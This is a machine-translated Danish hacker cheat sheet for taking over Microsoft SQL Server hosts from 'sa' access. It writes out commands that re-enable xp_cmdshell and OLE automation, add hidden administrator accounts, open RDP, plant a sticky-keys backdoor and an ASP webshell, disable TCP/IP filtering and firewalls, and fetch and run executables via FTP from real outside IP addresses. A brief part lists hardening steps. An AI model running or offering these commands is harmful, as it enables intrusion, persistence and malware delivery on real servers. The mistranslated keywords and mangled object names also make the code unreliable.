1433 Reparationsordrer
netuser SQLDebugger liste /add
net localgroup administrators SQLDebugger /add
Fejlmeddelelse: Kunne ikke finde lagret procedure 'master.. xp_cmdshell'。
Reparationsmetode: meget generelt, faktisk kan andre 126 127 repareres sammen,
Bortset fra xplog70.dll alt andet kan fikses med denne kommando
xp_cmdshell nye genopretningsmetoder
Trin 1: Slet:
Drop-procedure sp_addextendedproc
Drop-procedure sp_oacreate
Direktør sp_dropextendedproc 'xp_cmdshell'
Server: Msg 3701, Niveau 11, Tilstand 5, Linje 1
Det er ikke muligt at fjerne processen 'sp_addextendedproc', fordi den ikke findes i systemmappen.
Server: Msg 3701, Niveau 11, Tilstand 5, Procedure sp_dropextendedproc, Linje 18
Det er ikke muligt at fjerne processen 'xp_cmdshell', fordi den ikke findes i systemmappen.
Trin 2 Helbredelse:
dbcc tilføjede extendedproc ("sp_oacreate","odsole70.dll")
DBCC tilføjede udvidede proc ("xp_cmdshell","xplog70.dll")
Direkte recovery, uanset om sp_addextendedproc eksisterer eller ej
xplog70.dll rettelser:
Fejlmeddelelse: DLL-xplog70.dll eller en af DLL'erne, som DLL'en refererede til, kunne ikke monteres. Årsag: 126 (Det specificerede modul kan ikke findes.) )。
Fix XPLOG70.DLL (tjek først backup-mappen \x86\bin med filen, og udskift derefter følgende mappe)
Trin 1
Direktør sp_dropextendedproc 'xp_cmdshell'
Trin 2
DBCC AddExtendedProc ("xp_cmdshell","C:\SQL2KSP4\x86\BInn\xplog70.dll")
Fandt ikke den gemte procedure 'mester.. xp_cmdshell'。
Trin 1:
Opret procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (ejer.) Navn på funktion at kalde
*/
@dllname varchar(255)/* navn på DLL, der indeholder funktionen */
som
Sæt implicit_transactions i gang
hvis @@trancount > 0
Begynd
raiserror(15002,-1,-1,'sp_addextendedproc')
Tilbagevenden (1)
slut
dbcc tilføjedeextendedproc( @functname, @dllname)
Returner (0) -- sp_addextendedproc
GÅ
Trin 2:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
SQL Server blokerede adgangen til processen 'sys.xp_cmdshell' for komponent 'xp_cmdshell', fordi denne komponent blev lukket ned som en del af sikkerhedskonfigurationen for denne server. Systemadministratorer kan aktivere 'xp_cmdshell' ved at bruge sp_configure. For mere information om aktivering af xp_cmdshell, se Peripheral App Configurator i SQL Server Online Books-serien.
; EXEC sp_configure 'vis avancerede muligheder', 1 --
; OMKONFIGURÉR MED OVERRIDE --
; EXECUTIVE sp_configure 'xp_cmdshell', 1 --
; OMKONFIGURÉR MED OVERRIDE --
; EXEC sp_configure 'vis avancerede indstillinger', 0 --
Fjern SQL farlig lagring:
DROP-PROCEDURE sp_makewebtask
Exec Master.. sp_dropextendedproc xp_cmdshell
Exec Master.. sp_dropextendedproc xp_dirtree
Exec Master.. sp_dropextendedproc xp_fileexist
Exec Master.. sp_dropextendedproc xp_terminate_process
Exec Master.. sp_dropextendedproc sp_oamethod
Exec Master.. sp_dropextendedproc sp_oacreate
Exec Master.. sp_dropextendedproc xp_regaddmultistring
Exec Master.. sp_dropextendedproc xp_regdeletekey
Exec Master.. sp_dropextendedproc xp_regdeletevalue
Exec Master.. sp_dropextendedproc xp_regenumkeys
Exec Master.. sp_dropextendedproc xp_regenumvalues
Exec Master.. sp_dropextendedproc sp_add_job
Exec Master.. sp_dropextendedproc sp_addtask
Exec Master.. sp_dropextendedproc xp_regread
Exec Master.. sp_dropextendedproc xp_regwrite
Exec Master.. sp_dropextendedproc xp_readwebtask
Exec Master.. sp_dropextendedproc xp_makewebtask
Exec Master.. sp_dropextendedproc xp_regremovemultistring
Exec Master.. sp_dropextendedproc sp_OACreate
DROP-PROCEDURE sp_addextendedproc
Genopret udvidede lagrede procedurer
Genopret sp_addextendedproc først, udsagnet er som følger:
For det første:
Opret procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (ejer.) navn på funktion der skal kaldes */ @dllname varchar(255)/* navn på DLL, der indeholder funktionen */ som
Sæt implicit_transactions i gang
hvis @@trancount > 0
Begynd
raiserror(15002,-1,-1,'sp_addextendedproc')
Tilbagevenden (1)
slut
dbcc tilføjedeextendedproc( @functname, @dllname)
Returner (0) -- sp_addextendedproc
GÅ
For det andet:
Brug master
Direktør sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
Direktør sp_addextendedproc xp_dirtree,'xpstar.dll'
Direktør sp_addextendedproc xp_enumgroups,'xplog70.dll'
Direktør sp_addextendedproc xp_fixeddrives,'xpstar.dll'
Direktør sp_addextendedproc xp_loginconfig,'xplog70.dll'
Direktør sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
Direktør sp_addextendedproc xp_getfiledetails,'xpstar.dll'
Direktør sp_addextendedproc sp_OACreate,'odsole70.dll'
Direktør sp_addextendedproc sp_OADestroy,'odsole70.dll'
Direktør sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
Direktør sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
Direktør sp_addextendedproc sp_OAMethod,'odsole70.dll'
Direktør sp_addextendedproc sp_OASetProperty,'odsole70.dll'
Direktør sp_addextendedproc sp_OAStop, 'odsole70.dll'
Direktør sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
Direktør sp_addextendedproc xp_regdeletekey,'xpstar.dll'
Direktør sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
Direktør sp_addextendedproc xp_regenumvalues,'xpstar.dll'
Direktør sp_addextendedproc xp_regread,'xpstar.dll'
Direktør sp_addextendedproc xp_regremovemultistring, 'xpstar.dll'
Direktør sp_addextendedproc xp_regwrite,'xpstar.dll'
Direktør sp_addextendedproc xp_availablemedia,'xpstar.dll'
Slet sætningen, der udvider den lagrede procedure xp_cmdshell:
Direktør sp_dropextendedproc 'xp_cmdshell'
Genopret sql-sætningen i cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Åbn cmdshell SQL-sætningen
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Bestem om der findes lagringsudvidelse
Vælg count(*) fra master.dbo.sysobjects hvor xtype='x' og name='xp_cmdshell'
Returresultatet er 1, og det er OK
Genopret xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'; Vælg count(*) fra master.dbo.sysobjects hvor xtype='x' og name='xp_cmdshell'
Returresultatet er 1, og det er OK
Ellers, upload xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Blokér SQL-sætningen i cmdshell
sp_dropextendedproc "xp_cmdshell
En. Ændring af SA-adgangskodemetoden:
Efter at have forbundet med SQL Comprehensive Utilization Tool, udfør kommandoen:
exec sp_password NULL, 'ny adgangskode', 'sa'
(Tip: brug med forsigtighed!)
To. Patch blot den svage adgangskode.
Metode 1: Forespørg splitteren efter tilslutning:
hvis findes (vælg * fra
dbo.sysobjects hvor id = object_id(N'[dbo].[ xp_cmdshell]') og
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
executive sp_dropextendedproc N'[dbo]. [xp_cmdshell]'
GÅ
Tryk derefter på F5-tasten for at udføre kommandoen
Metode 2: Forespørgsel efter splitteren er tilsluttet
Det første skridt er at udføre: brug master
Trin 2: sp_dropextendedproc 'xp_cmdshell'
Tryk derefter på F5-tasten for at udføre kommandoen
DLL-xpsql70.dll eller en af DLL'erne, som DLL'en refererer til, kan ikke monteres. Begrundelse 126 (Den specificerede modul kan ikke findes. )
Gendannelsesmetode: Efter at have forespurgt splitterforbindelsen,
Trin 1: sp_dropextendedproc "xp_cmdshell"
Trin 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Funktionen xp_cmdshell kan ikke findes i bibliotekets xpweb70.dll. Årsag: 127 (Det angivne program kan ikke findes.) )
Gendannelsesmetode: Efter at have forespurgt splitterforbindelsen,
Trin 1 Udførelse: executive sp_dropextendedproc 'xp_cmdshell'
Trin 2: udfør sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Tryk derefter på F5-tasten for at udføre kommandoen
Hvis ingen af ovenstående metoder kan gendannes, bedes du prøve at tilføje kontoen direkte ved hjælp af følgende metoder:
Efter at have forespurgt splitterforbindelsen,
2000servser-systemet:
Deklarer @shell INT exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run', null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
Deklar @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run', null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP eller 2003Server System: 126 fejl! Orden
Declare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run', null,'c:\windows\system32\cmd.exe /c net-bruger Web$ hacker /add'
Deklar @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run', null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL Server blokerede adgangen til processen 'sys.xp_cmdshell' for komponent 'xp_cmdshell', fordi denne komponent blev lukket ned som en del af sikkerhedskonfigurationen for denne server. Systemadministratorer kan aktivere 'xp_cmdshell' ved at bruge sp_configure. For mere information om aktivering af xp_cmdshell, se Peripheral App Configurator i SQL Server Online Books-serien.
Udsagn udført af analysatoren:
EXEC sp_configure 'vis avancerede muligheder', 1; OMKONFIGURER; EKSEKUTIV sp_configure 'xp_cmdshell', 1; OMKONFIGURER;
Nogle gange, når ovenstående sætninger udføres med en query detacher-forbindelse, kan den lagrede procedure ikke findes sp_addextendedproc
Løsning:
Opret procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (ejer.) Navn på funktion at kalde */
@dllname varchar(255)/* navn på DLL, der indeholder funktionen */
som
Sæt implicit_transactions i gang
hvis @@trancount > 0
Begynd
raiserror(15002,-1,-1,'sp_addextendedproc')
Tilbagevenden (1)
slut
dbcc tilføjedeextendedproc( @functname, @dllname)
Returner (0) -- sp_addextendedproc
GÅ
Denne kode indsættes i forespørgselssplitteren og udføres
Explorer:
c:\windows\explorer.exe
Se indholdsfortegnelsen
Executive master.dbo.xp_subdirs 'C:\'
List-diskene
Exec Master.. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Vælg * fra OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Vælg * fra OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Version 5.00 >3389.reg
Echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Aktiveret"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
Echo [HKEY_USERS\. DEFAULT\Tastaturlayout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg
Åbn 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Består 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Tjek port 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Normal CMD-bagdør
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K går direkte til PS Mar
Exec Master.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
vælg * fra openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo farvel>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP direkte på PS-heste
Exec Master.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
vælg * fra openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo farvel>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Skift bagdørskommandoen
Oplys @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o ud
exec sp_oamethod @o, 'copyfile', null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
Oplys @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o ud
exec sp_oamethod @o, 'copyfile', null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
Kopier C:\Windows\explorer.exe C:\Windows\System32\sethc.exe
Kopier C:\Windows\System32\sethc.exe C:\Windows\System32\dllcache\sethc.exe
Oplys @o int
Direktør sp_oacreate 'wscrip fjern t.shell', @o ud
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX er kommandoen, du vil udføre
Skriv værdien, der er angivet i nøglen angivet i registreringsdatabasen), ved at bruge metoden (skriv bbb i nøglen HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
EXEC-mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo åbn 121.22.56.5>C:\bin.txt&@echo liste>>C:\bin.txt&@echo liste>>C:\bin.txt&@echo få gzn.exe>>C:\bin.txt&@echo Farvel>>C:\bin.txt&@ftp -S:C:\bin.txt&Del C:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Først kopierer ftp.exe til wmpub-mappen
@echo CD C:\WMPuBB\>C:\WMPuBB in.bat&@echo FTP -S:C:\WMPuBB\xiuxiu.txt>>C:\WMPuBB\in.bat
Åben 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL skriver en sætning
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA Sandbox Mode Promotion -----
----------------------
Exec Master.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Vælg * fra OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Vælg * fra OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389 SKIFT
Sætningen blev brugt:
Invasion
EXEC-mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Genopretning
EXEC-mester.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value=''
Billedkapring
EXEC-mester.. xp_regwrite --- det her er registreringsdatabase-redigering!
@rootkey='HKEY_LOCAL_MACHINE', ---Det er positionen!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', -----Det er også stillingen!
@value_name='Debugger', --- det er navnet på bordet!
@type='REG_SZ', --- her er meningen med at skrive!
@value='C:\WINDOWS\explorer.exe' ---- her er det skrevne indhold!
Hele processen går ud på at bruge master: xp_regwrite denne komponent er færdig,
1.sql kommando til at forespørge, om registreringsnøglen er blevet kapret
Exec Master.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql kommando kaprer registreringsdatabasens sticky key-funktion og erstatter den med joblisten (selvfølgelig kan du erstatte den med andre kommandoer, du ønsker)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql kommando til at fjerne kapringsfunktionen i registreringsdatabasens sticky key beskytter din server mod at blive udnyttet af andre
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL Write-filer
Declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o ud
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Scripts uden NET-eskalering
struser=wscrip for at fjerne t.arguments(0)
strpass=wscrip for at fjerne t.arguments(1)
set lp=createObject("Wscrip remove t.NETWORK")
oz="WinNT://"&lp. ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
OD. SetPassword strpass
OD. SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
OE. Tilføje(af. ADsPath)
For hver administrator i oe. Medlemmer
Hvis Struser=admin. Navn så
Wscrip fjernede t.echo struser og "Etableret med succes!"
wscrip til at fjerne t.quit
slut hvis
Næste
Wscrip fjern t.echo struser & "Brugeretablering mislykkedes!"
Gem ovenstående som bruger. VBS-fil
Derefter udfør cscrip for at fjerne brugernavnet user.vbs brugernavn-adgangskode
Ved at bruge JET sandbox-tilstand kan du løse problemer forårsaget af lagrede procedurer som XP_cmdshell og relaterede dynamiske linkbiblioteker. Af sikkerhedsmæssige årsager aktiverer systemet ikke sandkassetilstanden som standard, hvilket kræver, at xp_regwrite tænder sandkassetilstanden:
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1
Udfør derefter sandkasse-kommandoen for at tilføje en brugernavngiven test med adgangskoden 1234 til systemet:
vælg * fra openrowset('microsoft.jet.oledb.4.0','; database=c:\Windows
\system32\IAS\ias.mdb','vælg shell("cmd.exe /c netbrugertest 1234 /add")')
vælg * fra openrowset('microsoft.jet.oledb.4.0','; database=c:\Windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administratorer test /add")')
Forskellige operativsystemer har forskellige veje og skal tilpasses efter situationen:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
Derudover er nogle lagrede procedurer i Microsoft SQL Server 2005 lukkede som standard og kræver kommandoer for at åbne:
Tænd XP_cmdshell:
EXEC sp_configure 'vis avancerede muligheder', 1; OMKONFIGURER; EKSEKUTIV sp_configure
'xp_cmdshell', 1; OMKONFIGURER;
Åbn 'OPENROWSET':
executive sp_configure 'vis avancerede muligheder', 1; OMKONFIGURER; Eksekutiv sp_configure
'Ad hoc distribuerede forespørgsler',1; OMKONFIGURER;
Tænd for 'sp_oacreate':
executive sp_configure 'vis avancerede muligheder', 1; OMKONFIGURER; Eksekutiv sp_configure
'Ole Automatiseringsprocedurer',1; OMKONFIGURER;
Her er nogle situationer, hvor eksekveringskommandoen under sa er forkert:
1. DLL-xpsql70.dll eller en DLL, der refereres til af DLL'en, kan ikke indlæses. Begrundelse 126 (Den specificerede modul kan ikke findes. )
Denne situation er relativt almindelig, og reparationen er enkel og simpel, men der er betingelser. Hvis du kan liste mappen i dette tilfælde (med sqltools v2.0 er der en mappefunktion), kan tillykke med denne 80%-situation løses, hvis du kan liste kataloget, så find bare den xplog70.dll sti og udfør følgende kommando.
Trin 1
exec sp_dropextendedproc 'xp_cmdshell' (denne kommando er for at slette den oprindelige cmdshell, fordi den allerede er gået galt)
Trin 2
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXEC sp_configure 'vis avancerede muligheder', 0 –
Selvfølgelig er dette en SQL-kommando, udført med en forespørgselsanalysator. c:\Program Files\Microsoft SQL Server\MSSQL\Binn xplog70.dll\ i andet trin er stien for xplog70.dll, denne sti er relativt almindelig, hvis c-drevet ikke har den, kan du finde andre drevbogstaver.
2. Kan ikke finde funktionen xp_cmdshell i biblioteket xpweb70.dll. Årsag: 127 (Det angivne program kan ikke findes.) )
Faktisk er dette det samme som ovenstående 126, det vil sige, cmdshellen er forkert, så længe du finder backupen xplog70.dll følger ovenstående metode for at rette det.
3. Ikke fundet den lagrede procedure 'master.' xpcmdshell'
I dette tilfælde ser jeg på internettet, at metoden er:
Trin 1: Slet:
Drop-procedure sp_addextendedproc
Drop-procedure sp_oacreate
Direktør sp_dropextendedproc 'xp_cmdshell'
Trin 2 Helbredelse:
dbcc tilføjede extendedproc ("sp_oacreate","odsole70.dll")
DBCC tilføjede udvidede proc ("xp_cmdshell","xplog70.dll")
Faktisk er dette stadig det samme som ovenfor, faktisk, hvis du er forsigtig, vil ovenstående 126 127 kun fejle i at finde den gemte procedure 'master:. xpcmdshell' fordi det første skridt er at slette den lagrede procedure for cmdshell. Så i dette tilfælde skal du bare følge det andet trin ovenfor.
4. Fejlmeddelelse: SQL Server blokerede adgangen til proces 'sys.xp_cmdshell' af komponent 'xp_cmdshell', fordi denne komponent blev lukket ned som en del af serverens sikkerhedskonfiguration. Systemadministratorer kan aktivere 'xp_cmdshell' ved at bruge sp_configure. For mere information om aktivering af xp_cmdshell, se Peripheral App Configurator i SQL Server Online Books-serien.
Denne situation er den enkleste, fordi du ikke behøver at tænke over noget, bare udfør følgende kommando
; EXEC sp_configure 'vis avancerede muligheder', 1 --
; OMKONFIGURÉR MED OVERRIDE --
; EXECUTIVE sp_configure 'xp_cmdshell', 1 --
; OMKONFIGURÉR MED OVERRIDE --
; EXEC sp_configure 'vis avancerede muligheder', 0 –
Efter ovenstående fix kan du udføre cmd-kommandoen, og du vil begynde at øge din styrke. Jeg tjekker normalt først IP'en for at se, om det er et intranet, og så sender jeg en REG-forespørgsel HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp/v PortNumber for at tjekke terminalporten, og derefter netstat –an for at se, om terminalen er åben, og derefter netbrugerbrugerens adgangskode / Tilføj en bruger og så netet localgroup administrators user /add Hvis alt går godt, vil dette nedlægge en server. Men der er mange problemer i processen.
1. Nettostrømsforfremmelsen lykkes, men kan ikke forbindes til terminalen. Der er følgende situationer
(1) Serveren er på intranettet.
(2) TCP/IP-screening.
Kør følgende cmd-kommando først:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, eksporter den første del af registreringsdatabasen til TCP/IP-filtrering
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, eksporter anden del af registreringsregisteret til TCP/IP-filtrering
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", hvilket eksporterer tredje sted i registret om TCP/IP-filtrering
Gå derefter tilbage til C-drevet, 1.reg, 2.reg, 3.reg, download 1.reg, 2.reg, 3.reg tilbage til din harddisk for at redigere, find feltet EnableSecurityFilters for at se, om nøgleværdien efter dword er 00000000, hvis det er 00000001, betyder det, at administratoren har lavet TCP/IP-filtrering, vi skal bare ændre 1 til 0, 2. Reg og 3.reg laver de samme ændringer.
(3) Lav en IP-sikkerhedspolitik.
Kør cmd-kommandoen: cmd /c net stop policyagent for at stoppe IPSEC Services-tjenesten. Forbind terminalen igen.
(4) Login-tilladelsen for terminalen, som administratoren har sat, kan kun bruges af den angivne bruger.
(5) Firewall. Kør cmd-kommandoen: net stop alg /ynet stop sharedaccess
2. NET-eskalering opstår, og adgang nægtes
Du kan prøve net1 brugerbrugeradgangskode /add Hvis net1 også nægter adgang, kan du kopiere en shfit-backdoor og prøve at udføre cmd-kommandoen: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
Kopier C:\Windows\System32\sethc.exe C:\Windows\System32\dllcache\sethc.exe
Hvis du bliver bedt om det, kopier 1 fil, hvilket viser sig at være succesfuldt. Forbind til terminalen og tryk 5 shift for at se, hvad der dukker op. Leg med Kaka Explorer, tilføj nu bare en bruger manuelt.
3. Net-eskalering sker med adgangsnægtelsesfejl 5 (fremhæve)
I dette tilfælde behøver du ikke prøve net1, du kan prøve copy shift-backdooren, hvis kopien beder om at kopiere 0-filen, beviser det, at det ikke lykkes. Så kan du prøve at uploade det, hvis du kan, kan du direkte sende et ikke-net power escalation-værktøj, der kom ud for noget tid siden, og så tilføje en bruger. Men de fleste af disse sager kan ikke uploades, så du er nødt til at tænke over det. Da cmd kan udføres, kan filen downloades via cmd under ftp, men udgangspunktet med ftp er at kunne skrive tekst eller batchbearbejde. Derefter kan du skrive en tekst eller batche gennem en SQL-sætning.
Declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o ud
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp account'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp password'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (ingen net escalation script) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
Når forespørgselsanalysatoren er udført med succes, vil en 1.bat dukke op på C-drevet (hvis udførelsen lykkes, men C-drevet ikke er der, kan du ændre mappen til at skrive, fordi hvilken servers C-drevs rodmappe forhindrer skrivning)
Derefter udfører cmd ftp -s:c:\1.bat
Når dette er udført, downloader du et ikke-net eskalationsscript på CFT-drevet FTP eller skriver et VBS-eskalationsscript direkte
Declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o ud
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "password","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Derefter udfører cmd cscrip for at fjerne t c:\1.vbs
4. Den forrige repareres for at udføre cmd-kommandoer, men efter nogle reparationer vil nye problemer opstå
(1) Besked: Der opstod en fejl under udførelsen af xp_cmdshell. Kald 'CreateProcess' fejlede med fejlkode: '5'.
Fejl 5 er et fejlnummer, som systemet påkalder, CreateProcess er betydningen af at oprette en tråd, denne fejlgenerering har meget at gøre med cmd.exe af systemfiler, det ene er, at cmd slettes, det andet er, at tilladelsen til cmd er reduceret.
SQL til at tjekke terminalporte og åben status:
Exec Master.. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
